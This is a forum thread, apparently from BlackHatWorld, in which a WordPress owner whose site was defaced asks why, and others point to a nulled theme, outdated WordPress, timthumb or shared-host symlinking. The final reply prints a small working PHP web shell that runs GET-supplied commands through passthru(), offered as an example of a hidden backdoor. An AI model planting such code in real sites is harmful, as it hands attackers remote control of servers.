Site got Hacked! Need Help finding the cause.

Hi,
I have a site on WordPress platform which got hacked today. Although, no damage was done to the site, just the title and footer of the site was changed to show "Hacked by ----blah blah----". I wasn't able to log in and I couldn't receive the email for resetting password. I have limit login attempts and Wordfence plugins installed, and i receive emails when someone gets locked out trying password combinations, but nothing like that happened. I had the backup and everything and I could have restored everything right away, but that would have erased any traces of login that I could find on my site. So, after thinking for some time I thought I should check the Database of my website, and I know where the username and encrypted password are stored in the DB. So, I browsed and found that the username was changed and I didn't know if the password was changed or not because it was encrypted. So I changed back my username and also encrypted a password using md5 algo and pasted in the password field. Now, I was able to log into my account. When I was browsing the DB to see what was happened, I also noticed that the Blog title value was changed hence the change in the title and footer of the website. I changed it back and logged into my WP dashboard. Now, it was time to see the logs and I saw that someone logged into my WP account from an IP (I found the IP), but he didn't change anything besides the username, password and the title. Well, one cannot change the username from WP dashboard without using plugins, and I didn't see any trace of a new plugin installed on my site. So, it must have been done by editing the DB. Plus he only changed the title which is easy to change from the DB as well. So, that makes me think that he anyhow got into my DB and changed those fields using some vulnerability (I am not ruling out the possibility that he first logged into the WP, and then changed everything from there). Unless I find out the cause of my site getting hacked, I cannot do anything and he can/would edit my site again.
One solution I can think of is to remove the wp-login file when I am not going to log into my site, and uploading it just before i want to log into the WP dashboard, but if it was the DB which got hacked then this won't help in any way.
So, anyone with experience please give me some suggestions or help me if you can. I would really appreciate your help.
Thanks

Without looking at everything in depth and being a security guy its close to impossible to figure that out.

madoctopus said:

Without looking at everything in depth and being a security guy its close to impossible to figure that out.

Click to expand...

you're already in my skype contact list, so i'll talk to you when you get online!
thanks

Have you checked for the tomthumb exploit in your theme?

mission said:

Have you checked for the tomthumb exploit in your theme?

Click to expand...

it's timthumb lol, and i guess i don't have it in my theme.

Maybe you used a nulled theme? This usually happens with nulled stuff... The other thing i can think off now is that you are using an older version of Wordpress that's exploitable. Must be one of these two.

are you in shared server? Then i guess he did symlinking and read your wp site config file and attack your DB.when they set up symlinking on servers they can access to your database without any problem.Then can edit your email or pw or anything(Only on shared server).if you are on dedicated server he should find exploit and executing commands getting access.check your site they may have added some back-doored files to your server

WormWH said:

Maybe you used a nulled theme? This usually happens with nulled stuff... The other thing i can think off now is that you are using an older version of Wordpress that's exploitable. Must be one of these two.

Click to expand...

hmmm, yeah it is a nulled theme! and maybe I didn't update my WP version on time, i guess. Now it's updated, so I hope that it doesn't happen again.

MixerDJ said:

are you in shared server? Then i guess he did symlinking and read your wp site config file and attack your DB.when they set up symlinking on servers they can access to your database without any problem.Then can edit your email or pw or anything(Only on shared server).if you are on dedicated server he should find exploit and executing commands getting access.check your site they may have added some back-doored files to your server

Click to expand...

yeah it's a shared hosting! I've used many online scanners and they show no warnings, so I guess it's fine or should I look more deeper!

The gift that keeps on giving.
Your host can tell where it entered.
They tend to quit answering when they know it was from them...
I would definitely dump anything null. Especially todsthumb

Can I assume you're using Hostgator? All my sites hosted under Hostgator were hacked just a few days ago. Not sure if it's related.

Simple sql injection probably in one of your plugins, if not - then it's 50% chance another vulnerability in your plugins.

Shared hosting, Wordpress and a Nulled theme - no wonder you were hacked after all.

You are using a nulled theme....whats so hard to figure out, the whole point of nulling a theme is so you can hack people when they use it. No one is going to take there time nulling themes without inserting hack into the code. You deserve to get hacked for being stupid and using a nulled theme.

birdy23 said:

Can I assume you're using Hostgator? All my sites hosted under Hostgator were hacked just a few days ago. Not sure if it's related.

Click to expand...

no, I am not using hostgator. It's an offshore host.

Marsilirus said:

Shared hosting, Wordpress and a Nulled theme - no wonder you were hacked after all.

Click to expand...

nulled theme isn't the problem, I checked it before using. Check it at a lot of places to be sure. I guess I didn't update the WordPress on time.

LegitXXX said:

You are using a nulled theme....whats so hard to figure out, the whole point of nulling a theme is so you can hack people when they use it. No one is going to take there time nulling themes without inserting hack into the code. You deserve to get hacked for being stupid and using a nulled theme.

Click to expand...

hmmm, if that's what you think then I am glad that not everyone on the internet thinks like you. There are people who do things for helping other people. lol, yeah I deserve to be hacked if u say so. and I guess you always pay for all the softwares you use on your PC, and if the answer is no then stfu and get lost.

Check out my posts on this and implement. You will never get hacked again.

V1:

V2:

g0g0l said:

Check out my posts on this and implement. You will never get hacked again.

V1:

Code:

http://www.blackhatworld.com/blackhat-seo/blogging/495526-guide-make-your-wordpress-blog-hackproof-complete-guide.html

V2:

Code:

http://www.tech5.net/make-wordpress-blog-hack-proof-v2/

Click to expand...

I already used most of the precautions, but not all. I will try to implement them now. Thanks for sharing mate

xxsaumitraxx said:

hmmm, if that's what you think then I am glad that not everyone on the internet thinks like you. There are people who do things for helping other people. lol, yeah I deserve to be hacked if u say so. and I guess you always pay for all the softwares you use on your PC, and if the answer is no then stfu and get lost.

Click to expand...

You are pretty much asking for your website to be hacked when you use a nulled theme.

You can find a nulled version of every theme created....do you actually think people are taking the time to null them out of the goodness of there heart? Maybe, but more then likely No they are not.

They insert malicious code and share the themes so peoples sites get infected.

Sure there are some themes that are shared that are clean, but 90% are infected.

You should immediately stop using nulled themes. Themes are not something you can run on Virtual Machine or in a Sandbox like you can with cracked or nulled software on your computer. Once you install a nulled theme, you are installing an edited code with potential malicious script in it.

And not the mention, the "nulling" process erases certain parts of code and changes it, so that alone opens up security vulnerabilities that might not otherwise be in the theme.

If you actually care about your site not being hacked again, the first step would be removing the theme.

However its already probably to late to just "remove" the theme. If it was infected code, the only thing you can do is copy the posts and start fresh with a non nulled theme.

There was a great lengthy article somewhere a few weeks ago, regarding the use of "free" premium themes (or nulled themes as we call them). It shows that a HUGE amount of them had malicious coding implemented.. not just redirects and link-jacking stuff but creating new users with admin capabilities without listing it to you, basically giving away a key to your website to the coder.

Can't find the article though.. I'm sure some of you read it, I think I remember Matt Cutts posting it on twitter?

Anyway, what I'm trying to say is: DON'T USE NULLED THEMES (if you don't know & trust who nulled them)

Dont use admin as username

xxsaumitraxx said:

hmmm, yeah it is a nulled theme! and maybe I didn't update my WP version on time, i guess. Now it's updated, so I hope that it doesn't happen again.

yeah it's a shared hosting! I've used many online scanners and they show no warnings, so I guess it's fine or should I look more deeper!

Click to expand...

i highly recommend you to clear all and reinstall wp.because hackers can backdoored any php files with codes

Eg:

<?php$cmd=$_GET['silent'];
if(!empty($cmd)){
echo '<pre>';
passthru($cmd);
echo '</pre>';
exit();
}
?>

Click to expand...

i don't think any scanner will detect this small code.so think about it and take some strong action.